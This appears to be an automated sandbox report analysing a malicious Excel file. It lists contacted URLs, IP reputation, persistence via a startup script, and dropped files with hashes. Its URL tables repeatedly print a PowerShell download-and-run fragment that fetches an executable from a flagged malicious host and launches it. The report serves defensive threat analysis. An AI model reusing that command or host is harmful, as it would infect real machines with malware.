              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;0%Avira URL Cloudsafe
              https://cia.tf0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;t0%Avira URL Cloudsafe
              http://cia.tf0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;J0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;N0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cia.tf
              		172.67.129.178
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exetrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://stackoverflow.com/q/14436606/23354svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/mgravell/protobuf-netJtmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.entrust.net/server1.crl0powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://go.microsotmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.entrust.net03powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://ocsps.ssl.com0?powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                              		high
                              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;:powershell.exe, 00000002.00000002.377772524.00000000003D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-nettmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://cia.tfpowershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Qpowershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                        		high
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://ocsps.ssl.com0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                            		high
                                            https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;powershell.exe, 00000002.00000002.377790534.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.384599695.000000001C4B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                		high
                                                https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;tpowershell.exe, 00000002.00000002.384433088.000000001B146000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                  		high
                                                  https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.vbaProject.binfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://go.microspowershell.exe, 00000002.00000002.377877321.00000000039FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                      		high
                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crls.ssl.com/ssl.com-rsa-RootCA.crl0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                          		high
                                                          https://github.com/mgravell/protobuf-netitmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                              		high
                                                              http://cia.tfpowershell.exe, 00000002.00000002.377877321.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://stackoverflow.com/q/11564914/23354;tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://stackoverflow.com/q/2152978/23354tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://checkip.dyndns.org/qtmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.ssl.com/repository0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                                          		high
                                                                          http://ocsps.ssl.com0_powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                                            		high
                                                                            https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;Npowershell.exe, 00000002.00000002.383828170.000000001A815000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://ocsp.entrust.net0Dpowershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.377877321.0000000002391000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                                                  		high
                                                                                  https://secure.comodo.com/CPS0powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;Jpowershell.exe, 00000002.00000002.377761940.00000000002C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://reallyfreegeoip.org/xml/tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.67.129.178
                                                                                        		cia.tfUnited States
                                                                                        		13335CLOUDFLARENETUStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1562377
                                                                                        Start date and time:2024-11-25 14:57:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 58s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                        Number of analysed new started processes analysed:12
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:DGTCkacbSz.xlsx
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39(1).xlsx
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winXLSX@8/14@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 93%
                                                                                        • Number of executed functions: 536
                                                                                        • Number of non-executed functions: 32
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .xlsx
                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                        • Attach to Office via COM
                                                                                        • Scroll down
                                                                                        • Close Viewer

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 104.208.16.93
                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3604 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: DGTCkacbSz.xlsx

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        05:58:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
                                                                                        08:58:03API Interceptor25x Sleep call for process: powershell.exe modified
                                                                                        08:58:11API Interceptor176x Sleep call for process: tmp667.exe modified
                                                                                        08:58:33API Interceptor17x Sleep call for process: wscript.exe modified
                                                                                        08:58:35API Interceptor99x Sleep call for process: svcost.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.67.129.178idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                          FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                            Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              cia.tfidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                              • 172.67.129.178

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                              • 104.26.13.205
                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                              • 172.64.41.3
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.155.47
                                                                                              PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                              • 104.26.13.205
                                                                                              0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                                              • 172.64.41.3
                                                                                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                              • 104.21.24.198
                                                                                              CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.12.205
                                                                                              New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.74.152

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              05af1f5ca1b87cc9cc9b25185115607dOC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              • 172.67.129.178
                                                                                              Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 172.67.129.178
                                                                                              Dl2EmyL53n.docGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.129.178
                                                                                              pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              • 172.67.129.178
                                                                                              PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                              • 172.67.129.178
                                                                                              Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                              • 172.67.129.178
                                                                                              Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 172.67.129.178
                                                                                              #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                              • 172.67.129.178

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6916
                                                                                              Entropy (8bit):4.765218321768022
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV
                                                                                              MD5:665354A1A9139D1FA96E6FCC7F1FCE73
                                                                                              SHA1:8477F42550FBBA457D4015AAAC889272C7FAF1D8
                                                                                              SHA-256:146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01
                                                                                              SHA-512:F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........&.w.....w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1^.......Test-Path........Limit-EventLog........Show-ControlPanelItem........Get-Content........Rename-

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:@...e...........................................................

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AE0962.png

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:PNG image data, 1209 x 635, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):434291
                                                                                              Entropy (8bit):7.997330288407972
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:Kl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv253:K5PBexJJF2cSwG4ofTn53
                                                                                              MD5:DAE027B27EC83FBAEC24D5DFB4847433
                                                                                              SHA1:33BFCDF151B8CBD522256CC5B813549FE5EEB1D1
                                                                                              SHA-256:6C3FF9BA646AF527087B7CA1A9E93C2F06C7C0A4CC1A373C8DA4F0A868C7C319
                                                                                              SHA-512:380F4CD5671F96AFCFAD25E0E2198D7BEFC66A9A5E8715004DA35EB7220CF2FB190EDCB90B7E63F1A734B4862E063B17844D77456930302284953FF153647202
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:.PNG........IHDR.......{.............sRGB.........pHYs..........+......IDATx^......u'.O.;.sB.. @...sR %Q.d.+Z.d.,.}.....;..|..'.>..IQ...@. ..s....s.....W...{v{V....bBwU.PU.[..+.`8P..".M$..5Z...._....C..J|>.8.Q.9..S=...eEYKHGN...+.^v.7[.e7<v.\b.}L.r4j.-y.<...)HuN.......L....9.^.*.S-.....r...{...+....8....s.M.GsoI~..Gi....P9.r@.....9.g.3.......O.x...;M.....JW...........?..F..N..hB..h1...U....K..Z.....Yh.V+.....1......%...{..P..%R.hS.*.C......G.Z....({.h..C')Y..tG.!.8....D,="....&J..g~..~.7s..x...lK&h.`E2.Q~..E.p...iUz...,(/=..g..(.#...m.(_..L.....qg).....S3#%.i...5$]i.....f..R.(.s..........C....^4.5.Zdeq....t.DCZ....~.(1{.$...S...R.b ....0*.V>.LN...P..G......c..<.....O..2.A:.....*fSx.\..I.."q..T.l..8...q..?U.d.?<..dW1...A.T1;..... ...M...'W...2'..@j4f..r'!.".E....,.....8ijN.8."...~.U.....N.3..:.....+.....W&...p.h..u.}8...6...-.-....&.7...m$.......s..[:......-...(V.....r..Q.N.{..#.....o....J.........H..A..9V...P3U?.,..I.?.C.o,h......-..@v!.

                                                                                              C:\Users\user\AppData\Local\Temp\jalwz4er.hx1.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\tmp667.exe

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1072096
                                                                                              Entropy (8bit):7.751716236673022
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:AY2YACYOYGYAAYAtY0YHYAkYAtYJYAAYoYA2YnYAqYDYAHONafeTZce9rlmxTfgX:UfeTZcYhmCBqKzSdG
                                                                                              MD5:2ED7362E959D42385D4E6D231A6840DD
                                                                                              SHA1:B3CC47AC92296D978FC991D9658C771F225DBF18
                                                                                              SHA-256:13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30
                                                                                              SHA-512:66553BB74D63E2D8BB47751F87F93DEE66C4ACBE647115DEA5148D6B301F0A6802AE972A3FC26C1BCF9412775F1FBFD6238C1B477F726E0386CDEF183551B758
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g.....................J........... ... ....@.. ....................................`.................................\...O.... ..nF...........>............................................................... ............... ..H............text........ ...................... ..`.rsrc...nF... ...H..................@..@.reloc...............<..............@..B........................H........q.............................................................?.C.:....g|........>~.g?..!.....t}....]...W........>6#S....>.....`T?.(.>_'.>.......&!?.V!......>&..^..f.....O.n?T.>b,.>.......xcm?>.........7.._...h".......{..7?..&.......w..9..8f........f?.Q.>........+.d?Y.............<.'....?......r?a.G..`}>....*..>..N.G......r6a?.?.>.Y.>....z..?AH2?...>....-'....|..Yk.....g....8..7.O?.........:u>..A.....,J.>..I...n.....q.Z...a..l......PY?6..>+l.....H...../.

                                                                                              C:\Users\user\AppData\Local\Temp\xrkefh21.pa1.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\~DFCFC1D8AC29FA4D1B.TMP

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):16384
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                              SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                              SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
